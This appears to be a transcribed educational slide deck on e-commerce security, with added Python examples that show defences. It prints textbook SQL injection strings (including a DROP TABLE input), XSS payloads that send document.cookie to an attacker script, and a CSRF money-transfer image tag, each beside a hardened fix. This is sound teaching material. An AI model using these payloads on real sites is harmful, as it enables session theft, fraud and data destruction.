Web shop security Zlatan Filipusic, Arman Nasufovic, Arturo Quesada Gil, Andres Reyes Navas and Jimmy Sjöstrand.

1 Web shop security Zlatan Filipusic, Arman Nasufovic, Arturo Quesada Gil, Andres Reyes Navas and Jimmy Sjöstrand

2 Web shop security
User perspective
Developer / Admin perspective

3 User perspective
Seller's trustworthiness
Secure web site – https
Passwords
Viruses / Spyware
Cookies

4 Payment options
Credit card
Direct internet bank payment

5 Electronic credit card, E-card
Limited time
Limited money

6 Developer / Administrator perspective
Confidentiality
Integrity
Availability

7 Developing secure homepages
SSL / https
PSP
3D Secure
PCI DSS
Hacking & Cracking
Social Engineering
Policies
Physical Security

8 VULNERABILITIES IN E-COMMERCE: INTRODUCTION
e-Commerce grows exponentially, principally B2B and B2C.
The INTERNET must provide the communication at the right time and in the right way.
As an enterprise's profits depend on offering its services better and faster than its competitors, its information becomes MORE SENSITIVE and MORE DANGEROUS in the wrong hands: "Customer information is like gold to marketers".
INTERNET SERVICES are growing exponentially too:
more COMPLEX software == more PROBLEMS DEVELOPING software
+ FASTER DEVELOPMENT == POORER SECURITY implementation
+ LACK of KNOWLEDGE about HOW TO SECURE the customer's personal information
= WEAKNESSES IN SECURING INFORMATION ARE INCREASING
"Your system is only as secure as the people who use it"

9 VULNERABILITIES IN E-COMMERCE: THE GENERAL CONTEXT
The software environments of web applications are NOT implemented according to a SECURITY DESIGN:
Programmers are not well trained in secure programming techniques
Weak mechanisms for ensuring sanitized inputs and outputs (e.g. improper input validation, improper escaping and structuring of output)
Designers don't specify an independent and restricted environment for the application
Undefined policies for restricting the software environment:
  Run privileges → total control of the software environment
  Error messages → disclosure of software architecture and implementation
  Virtualization → an attack's impact spreads further into the software environment
Relying on security through obscurity: software protection mechanisms that rely on secrecy == exploitable by reverse engineering
Trust in third-party software
Maintainers and managers don't assess and implement security across the whole software lifecycle
Misuse of automated/static and manual/dynamic analysis (e.g. fuzzers, scanners, pen testing)
RESULT: "You can't effectively and consistently manage what you can't measure, and you can't measure what you haven't defined..." → SOFTWARE WEAKNESSES

10 VULNERABILITIES IN E-COMMERCE: DIFFERENT TECHNIQUES APPROACHING WEAKNESSES – "INJECTION"
INJECTION attacks happen when untrusted data is sent to an interpreter as part of a command or query.
The attacker's modified data can mislead the interpreter (in the back-end database) into executing unintended commands or accessing unauthorized data.
Two front-end injection attacks:
Incorrectly filtered escape characters
Incorrect type handling
One back-end injection attack:
Blind injection

11 VULNERABILITIES IN E-COMMERCE: DIFFERENT TECHNIQUES APPROACHING WEAKNESSES – "INJECTION EXAMPLES"
Incorrectly filtered escape characters
The following statement is crafted by the attacker so that it always evaluates to true:
SELECT * FROM users WHERE name = '' OR '1' = '1'
With this statement the attacker can force the selection of a valid user name, breaking the authentication procedure.
Incorrect type handling
The input field is not type constrained (strongly typed), so the attacker can craft the next query:
SELECT * FROM userinfo WHERE id = " + type_not_constrained_input_value + " ; "
Supplying the input 1;DROP TABLE `users` yields:
SELECT * FROM userinfo WHERE id = 1;DROP TABLE `users`;
With this statement the attacker deletes the users table in the database, so the integrity of the data is compromised.

12 VULNERABILITIES IN E-COMMERCE: DIFFERENT TECHNIQUES APPROACHING WEAKNESSES – "INJECTION EXAMPLES"
Blind injection
The attacker introduces conditional queries in order to reveal information that is not disclosed at first, using error messages and database responses to find any possible injection point.
A typical attempt: the attacker knows that this query is run:
SELECT title, description, body FROM items WHERE ID = 2
He/she appends "and 1=2" to the parameter, so the database receives:
SELECT title, description, body FROM items WHERE ID = 2 AND 1=2
If the attacker receives a different page in response, he/she knows that the application is vulnerable to injection.

13 VULNERABILITIES IN E-COMMERCE: DIFFERENT TECHNIQUES APPROACHING WEAKNESSES – "INJECTION" (OWASP TOP TEN 2010)
Diagram: an application attack travels through the network layer (firewalls), the web server on a hardened OS, the app server and custom code, down to the databases; HTTP request → SQL query → DB table → HTTP response.
"SELECT * FROM accounts WHERE acct='' OR 1=1--'"
1. Application presents a form to the attacker
2. Attacker sends an attack in the form data
3. Application forwards attack to the database in a SQL query
4. Database runs query containing attack and sends encrypted results back to application
5. Application decrypts data as normal and sends results to the user
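The two injection patterns on slide 11 and the blind probe on slide 12, reproduced in Python against an in-memory SQLite database with constructed sample rows, each beside its hardened form. This is an added example, not code from the presentation; the table layout, row values and function names are assumptions made for the demo.

```python
import sqlite3

# Constructed sample data: an in-memory SQLite database standing in for the shop's back end.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("CREATE TABLE items (id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.executemany("INSERT INTO items VALUES (?, ?)", [(1, "Lamp"), (2, "Chair")])
    return conn

# --- Incorrectly filtered escape characters (slide 11) ---
def login_vulnerable(conn, name):
    # The slide's pattern: the user-supplied name is glued into the SQL text,
    # so a quote in the input ends the string literal and the rest becomes SQL.
    sql = "SELECT * FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()

def login_parameterized(conn, name):
    # Hardened form: a bound parameter is sent as data and never parsed as SQL.
    return conn.execute("SELECT * FROM users WHERE name = ?", (name,)).fetchall()

# --- Incorrect type handling (slide 11) ---
def item_by_id_typed(conn, raw_id):
    # Hardened form: enforce the type before the value reaches the query.
    # "1;DROP TABLE `users`" is rejected here with a ValueError.
    item_id = int(raw_id)
    return conn.execute("SELECT title FROM items WHERE id = ?", (item_id,)).fetchall()

# --- Blind injection probe (slide 12), reproduced against a vulnerable lookup ---
def item_vulnerable(conn, raw_id):
    # Unquoted numeric concatenation, the second pattern on slide 11.
    # (Python's sqlite3 execute() refuses stacked statements; many other drivers do not.)
    return conn.execute("SELECT title FROM items WHERE id = " + raw_id).fetchall()

def probe_reveals_injection(conn, lookup, item_id):
    # Defender's self-check for slide 12: if the "AND 1=1" and "AND 1=2" variants
    # of the same id give different results, the endpoint evaluates caller-supplied SQL.
    try:
        return lookup(conn, item_id + " AND 1=1") != lookup(conn, item_id + " AND 1=2")
    except ValueError:
        return False  # the input was rejected outright by the type check
```

The parameterized login returns nothing for the slide's `' OR '1'='1` input because the driver binds it as a string value; the typed lookup turns the `1;DROP TABLE` input into a rejected request before any SQL is built.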

14 VULNERABILITIES IN E-COMMERCE: DIFFERENT TECHNIQUES APPROACHING WEAKNESSES – "XSS"
XSS (Cross-Site Scripting) attacks occur when a webapp takes unsanitized data supplied by an attacker and sends it to a user's web browser.
The attacker can then execute scripts in the user's browser to:
Obtain session cookies
Redirect the user to other malicious sites
Bypass access control mechanisms (like the same-origin policy)
There are 3 principal variants:
Non-persistent attack
Persistent attack
DOM-oriented attack
This vulnerability relies on the trust the user's browser places in the webapp.

15 VULNERABILITIES IN E-COMMERCE: DIFFERENT TECHNIQUES APPROACHING WEAKNESSES – "XSS NON-PERSISTENT"
A non-persistent attack requires that the user visit a crafted link or an object containing malicious code.
Example: "This attack steals the user's authorization when the user is required to enter a credit card number; the attacker gains access to the web server by stealing the user's session ID."
1. The attacker finds that the server echoes the request parameter in its response without validation:
(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
2. The attacker embeds code in the "CC" field that redirects the user's session ID to an untrusted web site:
'><script>document.location=' bin/cookie.cgi?foo='+document.cookie</script>'
3. The attacker receives the user's session ID at the malicious site and can impersonate the user's browser.

16 VULNERABILITIES IN E-COMMERCE: DIFFERENT TECHNIQUES APPROACHING WEAKNESSES – "XSS PERSISTENT AND DOM-ORIENTED ATTACK"
A persistent attack uses the web site itself to deliver the code to the user. By storing crafted content containing JavaScript, the attacker can introduce this piece of embedded code:
<SCRIPT> document.location= ' bin/cookiesteal.cgi?'+document.cookie </SCRIPT>
A DOM-oriented attack makes the user's browser execute pieces of a modified DOM controlled by the attacker. In this case the embedded malicious code can steal the user's session cookie once the user is made to click:
<script>alert(document.cookie)</script>
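The slide-15 Java line rebuilt in Python beside an output-encoded version, plus the cookie flags that blunt the `document.cookie` theft used by all three XSS payloads on slides 15 and 16. This is an added example, not code from the presentation; the payload constant copies the slide's "CC" field value (with the site URL elided as it is on the slide), and the function and cookie names are assumptions made for the demo.

```python
import html

# Constructed for the demo: the slide-15 payload (the attacker's site URL is elided, as on the slide).
CC_PAYLOAD = "'><script>document.location=' bin/cookie.cgi?foo='+document.cookie</script>'"

def render_vulnerable(cc):
    # Slide 15's pattern: the request parameter is concatenated into HTML unencoded,
    # so a quote in the input closes the attribute and the rest becomes live markup.
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"

def render_encoded(cc):
    # Hardened form: entity-encode the value for an attribute context. quote=True also
    # encodes ' and ", so the input can never close the attribute or open a new tag.
    return "<input name='creditcard' type='TEXT' value='" + html.escape(cc, quote=True) + "'>"

def contains_live_script(markup):
    # Check used below: does an actual <script> element appear in the rendered output?
    return "<script>" in markup.lower()

def session_cookie_header(name, value):
    # Every payload on slides 15-16 reads document.cookie. HttpOnly hides the cookie from
    # script, Secure keeps it off plain HTTP, SameSite limits cross-site sending (CSRF, slide 17).
    return f"{name}={value}; HttpOnly; Secure; SameSite=Lax"
```

Encoding must match the output context: `html.escape` is right for text and quoted attributes, while a value placed inside a URL or a script block needs that context's own encoding.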

17 VULNERABILITIES IN E-COMMERCE: DIFFERENT TECHNIQUES APPROACHING WEAKNESSES – "CSRF"
CSRF (Cross-Site Request Forgery) attacks exploit the trust that a webapp places in the user's browser.
These attacks force an authenticated user of a web site to send requests to the server without the user's knowledge.
Web servers are often designed to accept "trusted" requests from trusted users without any mechanism to verify that the requests are intended: the attacker can trick the web site into treating requests the user never intended as "trusted requests".
CSRF together with XSS is a bigger threat, because XSS can be used as the base for a CSRF attack operating under the same-origin policy (2 trusted places = same domain and same protocol).

18 VULNERABILITIES IN E-COMMERCE: DIFFERENT TECHNIQUES APPROACHING WEAKNESSES – "CSRF ATTACK EXAMPLE"
EXAMPLE: "A user is browsing a vulnerable web site. He/she needs to transfer money to buy a product. The user is authenticated. How can an attacker compromise the user's money with a CSRF attack?"
1. The user makes a request on the web site, and the request's content is clear text:
2. The attacker controls the traffic and can store information on the web site. He/she receives the request, constructs a new request transferring money from the user's account to the attacker's account, embeds it in an image tag and stores it in the vulnerable web site:
<img src=" height="0" />
3. If the user's browser holds the cookie with the session info, then while the user is authenticated and "viewing" the image, the embedded forged request is sent from the user's browser as an "authorized" hidden request.
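The transfer handler from the slide-18 scenario with a synchronizer token added, showing why the hidden image request fails while the shop's own form succeeds. This is an added example, not code from the presentation; the server key, session id, account names and field names are constructed for the demo.

```python
import hashlib
import hmac
import secrets

# Constructed per-deployment secret; in production it lives in server config, not in code.
SERVER_KEY = secrets.token_bytes(32)

def csrf_token(session_id):
    # Synchronizer token bound to the session by an HMAC. The forged <img> request on
    # slide 18 carries the session cookie automatically but cannot know this value.
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def transfer(session_id, form, balances):
    """Money-transfer handler (constructed). `form` holds the POST fields; `balances`
    maps account name -> amount. Returns True only if the transfer was executed."""
    expected = csrf_token(session_id)
    if not hmac.compare_digest(form.get("csrf_token", ""), expected):
        return False                       # slide 18's hidden request stops here
    src, dst, amount = form["from"], form["to"], int(form["amount"])
    if amount <= 0 or balances.get(src, 0) < amount:
        return False
    balances[src] -= amount
    balances[dst] = balances.get(dst, 0) + amount
    return True

def legitimate_request(session_id, src, dst, amount):
    # The shop's own form carries the token the server rendered into the page.
    return {"csrf_token": csrf_token(session_id), "from": src, "to": dst, "amount": str(amount)}

def forged_image_request(src, dst, amount):
    # What the stored <img src="..."> on slide 18 can produce: the fields the attacker
    # chose, with no token, because the token is never visible cross-site.
    return {"from": src, "to": dst, "amount": str(amount)}
```

Two further points the example relies on: an image tag issues a GET, so state-changing actions should only be accepted on POST, and a `SameSite=Lax` session cookie stops the browser from attaching the cookie to that cross-site image request in the first place.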

19 VULNERABILITIES IN E-COMMERCE: SOME STATISTICS (FROM 2008)
Chart: web applications with detected vulnerabilities

20 Social Engineering
Targets
Technique
Consequence
Prevention

21 Policy Making
Purpose statement
Applicability and scope statement
Effective date
Responsibilities
Policy statement
Background
Definitions

22 Physical Security
Lock up the server rooms
Set up surveillance
Make sure vulnerable devices are locked up
Use rack-mount servers
Don't forget about the workstations
Keep intruders out of the computer/server case

23 Physical Security
Protect portable devices
Take backups and keep them secure
Disable the drives
Protect your printers

24 SSL: Secure Sockets Layer
Enables secure data exchange between client and server
Protocol below the application layer
Confidentiality (encryption)
Integrity (MAC)

25 SSL Services
Fragmentation: divides data into blocks of 2^14 bytes
Compression: data can be compressed (optional)
Message integrity: keyed hash function (MAC)
Confidentiality: symmetric key cryptography
Framing

26 Handshake
No handshake, no security
Enables exchange of keys
Reduces the risk of man-in-the-middle attacks
Sets up parameters
About 10 steps in the handshake:
Which cipher suites and SSL versions are supported
Client gets the server's public key from the server certificate
Client creates a pre-master secret and sends it encrypted to the server
The pre-master secret is used to create a master secret
The master secret is then used to create session keys and auth keys

27 MAC: Message Authentication Code
A hash computed over the message and an authentication key
Used to authenticate the sender of a message
(Message + AuthKey) = Hash
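The keyed hash from slide 27 carried through in Python with the HMAC construction, framed the way the SSL record layer of slide 25 attaches a MAC to each fragment, and verified on the receiving side. This is an added example, not code from the presentation; the key and message bytes are constructed, and HMAC-SHA256 is used because it is the standard keyed-hash construction rather than the slide's literal concatenation.

```python
import hashlib
import hmac

TAG_LEN = 32  # SHA-256 output length in bytes

def mac(key, message):
    # Keyed hash over the message, i.e. the slide's (Message + AuthKey) = Hash, built with
    # HMAC rather than plain concatenation; SSL/TLS record protection uses HMAC for this job.
    return hmac.new(key, message, hashlib.sha256).digest()

def protect(key, message):
    # SSL-style record framing: payload followed by its MAC.
    return message + mac(key, message)

def verify(key, record):
    # Recompute the MAC and compare in constant time; hand back the payload only on a match.
    if len(record) < TAG_LEN:
        raise ValueError("record too short to carry a MAC")
    body, tag = record[:-TAG_LEN], record[-TAG_LEN:]
    if not hmac.compare_digest(tag, mac(key, body)):
        raise ValueError("MAC mismatch: message altered or wrong key")
    return body
```

`hmac.compare_digest` matters here: comparing tags with `==` leaks, through timing, how many leading bytes of a guessed tag were right.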

28 Putting it all together Exchange of information using SSL

29 SSL Weaknesses
Cipher suites can be weak
Man in the middle
Keyjacking
Fake certificates

30 PSP: Payment Service Provider
DEFINITION OF PSP: "PSPs offer merchants online services for accepting electronic payments by a variety of payment methods including credit card, bank-based payments such as direct debit, bank transfer, and real-time bank transfer based on online banking."
Solution for problems in connecting the e-market with banks
2 different fee policies
Security

31 List of PSPs

32 3D SECURE
DEFINITION OF 3D SECURE: "3D Secure is an XML-based protocol used as an added layer of security for online credit and debit card transactions."
Security
Three-domain model for authentication:
Acquirer Domain
Issuer Domain
Interoperability Domain
Based on SET

33 PCI DSS: Payment Card Industry Data Security Standard
Security standard to control credit card info
Defined by the PCI SSC
Unified from:
Visa Card Information Security
MasterCard Site Data Protection
American Express Data Security Operating Policy
Discover Information and Compliance
JCB Data Security Program
Objectives
Protected and unprotected data
Security techniques

34 PCI DSS Requirements
Build and maintain a secure network
1. Install and maintain a firewall configuration to protect cardholder data.
2. Do not use vendor-supplied defaults for system passwords and other security parameters.
Protect cardholder data
3. Protect stored cardholder data.
4. Encrypt transmissions of cardholder data across open, public networks.
Maintain a vulnerability management program
5. Use and regularly update anti-virus software on all systems commonly affected by malware.
6. Develop and maintain secure systems and applications.
Implement strong access control measures
7. Restrict access to cardholder data by business need-to-know.
8. Assign a unique ID to each person with computer access.
9. Restrict physical access to cardholder data.
Regularly monitor and test networks
10. Track and monitor all access to network resources and cardholder data.
11. Regularly test security systems and processes.
Maintain an information security policy
12. Maintain a policy that addresses information security.

